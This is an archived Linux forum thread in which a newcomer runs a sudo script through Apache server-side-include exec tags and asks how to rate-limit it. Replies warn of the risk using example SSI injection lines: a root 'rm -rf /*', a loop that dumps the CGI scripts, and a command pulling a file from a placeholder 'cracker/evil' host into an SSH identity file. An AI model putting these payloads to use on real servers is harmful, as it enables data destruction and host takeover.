when using SSI, can I limit how often a command can be run?
Linux - NewbieThis Linux forum is for members that are new to Linux.
Just starting out and have a question?
If it is not in the man pages or the how-to's this is the place!
Welcome to LinuxQuestions.org, a friendly and active Linux Community.
You are currently viewing LQ as a guest. By joining our community you will have the ability to post topics, receive our newsletter, use the advanced search, subscribe to threads and access many other special features. Registration is quick, simple and absolutely free. Join our community today!
Note that registered members see fewer ads, and ContentLink is completely disabled once you log in.
If you have any problems with the registration process or your account login, please contact us. If you need to reset your password, click here.
Having a problem logging in? Please visit this page to clear all LQ-related cookies.
Introduction to Linux - A Hands on Guide
This guide was created as an overview of the Linux Operating System, geared toward new users as an exploration tour and getting started guide, with exercises at the end of each chapter.
For more advanced trainees it can be a desktop reference, and a collection of the base knowledge needed to proceed with system and network administration. This book contains many real life examples derived from the author's experience as a Linux system and network administrator, trainer and consultant. They hope these examples will help you to get a better understanding of the Linux system and that you feel encouraged to try out things on your own.
Click Here to receive this Complete Guide absolutely free.
when using SSI, can I limit how often a command can be run?
For instance, I've got a little script that goes out and gets all my rss feeds, then parses them to display on my webpage. Rather than have cron go out and update these feeds every 10 minutes (I want to make sure they're always fresh, but this seems a bit much), I'm just using server side includes and have a link on my page that executes the script (via sudo, which I have configured to allow apache to run this command without password) so that I only have to update them when I'm actually reading them. This seems to be working really well, but it leaves the obvious ability for somebody viewing the webpage to click the link a million times and bog down (or crash) my PC.
To make sure I'm clear, here's the code on the webpage to issue the command...
<!--#exec cmd="sudo getnews" -->
So, get to the point, right? Is there a setting somewhere with which I can control how often this can be done? I've got the getnews "script" located in /bin and it's basically just a shell "script" (I use quotes cuz I'm no script writer...it's just a file that starts with #!/bin/bash and then just issues a bunch of calls to a perl script, so I call that a script). Can I either set a minimum time between allowed runs of this file in /bin, or is there some way I can set a minimum wait between times apache is allowed to use the sudo command (remember though, no password is set, so I can't just use the password expire) to issue this, which would essentially create the same effect?
You can look at the man page to wait or sleep and use that. Here is the first line of the man page from sleep;
The sleep utility suspends execution for a minimum of seconds. It is
usually used to schedule the execution of other commands (see EXAMPLES
But, if you decide to stay with the current set up of your program, you are creating a real big security risk. Allowing the server-side include #exec command allows all users to execute system commands directly in the server file system. So I can do this on your machine as root right now;
<!--#exec cmd="sudo rm -rf /*" -->
This would probably be the least of your problems. A rootkit will be installed faster than you can say debian. If you do not take security precautions people will abuse your box and the whole internet will laugh and point at you.
THanks for the reply. I'll check the man pages for those...
As for the security risk, I had read that. Let me just confirm that what I've done is sufficient....
I DO have a guestbook on the site (which is what helps create the risk due to the write access that this gives visitors, right?), but it has it's own subdirectory. I have set that directory in the httpd.conf file to NOT allow exec's. This works, right? I've also tried to confirm by adding a new guestbook entry, and adding this to it...
The issue is not only creating a directory where the shtml file cannot execute commands, it is also who it runs as. Apache is usualy set to run as a non-root user. If you have changed /etc/sudo to allow it to execute commands as root, then it can do whatever it wants in the wrong hands. Someone could re-write the URL to include malicious code that Apache can execute as root! This is serious.
Did you try <!--#exec cmd="sudo ls"--> ?
Or <!--#exec cmd="for i in `ls /var/www/cgi-bin/`; do cat $i; done;-->
Or <!--#exec cmd="touch .ssh/indentity.pub"-->
<!--#exec cmd="cat http://cracker/evil > .ssh/indentity.pub"-->
I recommend not allowing Apache to be run as root and taking the apache user out of the sudoers file. If apache needs to get info from a remote site, why don't you script it with curl or wget? Then you can download it anywhere you want and the .shtml file can process it. Then you decrease your exposure and risk considerably.
I'm actually using wget already to get a couple of the feeds (for some reason my JSMFeed.pl script doesn' like a couple of them), but it too would start to bog my system down if the page were refreshed repeatedly....right? That is assuming you were suggesting adding the curl code right into the webpage....
I had set the sudoers file so that apache could run ONLY the /bin/getnews script, figured that would take care of the sudo security risk.
After all this talk I've gotten all security-nervous again, so I dumped the whole exec cmd thing and went back to having cron update the feeds every 10 minutes.
Then I just put a refresh link on the page, for those internet newbies who can't find the button....;-)
You're probably right. That was how I originally set it up, but then I decided that it was a waste to have the feeds updating when I'm not at the computer looking at them, so I put this in.
I'm starting to think I jsut did this for something to do, as the more I think about it the more silly this whole venture seems. But again, it was a fun little experiment and I learned something. I have resorted to my original setup, which really was the most logical. I have cron updating the feeds every 10 minutes (as well as a couple of weather radar images - more use for wget) and the frame on the webpage auto updates every 5.
Question regarding wget; Is there a way to COMPLETELY suppress ANY output from the command? I read through man and info, and I can get it to run "in the background" and all that, but it still produces and output message like "continuing in background...PID.....output will be written to wget-whatever.log" or whatever (which then gets mailed to me in /var/spool/mail), and then, of course, saves a log file. So, I've got cron deleting these log files periodically as well as my /var/spool/mail (seriously, cron is the coolest tool ever!), but is there any way to just stop them from being created?
Anyways, regardless of whether or not you can answer that, thanks for the insight here. I'm glad I was able to be persuaded back to keeping it simple....
Last edited by jeffreybluml; 03-01-2005 at 10:07 AM.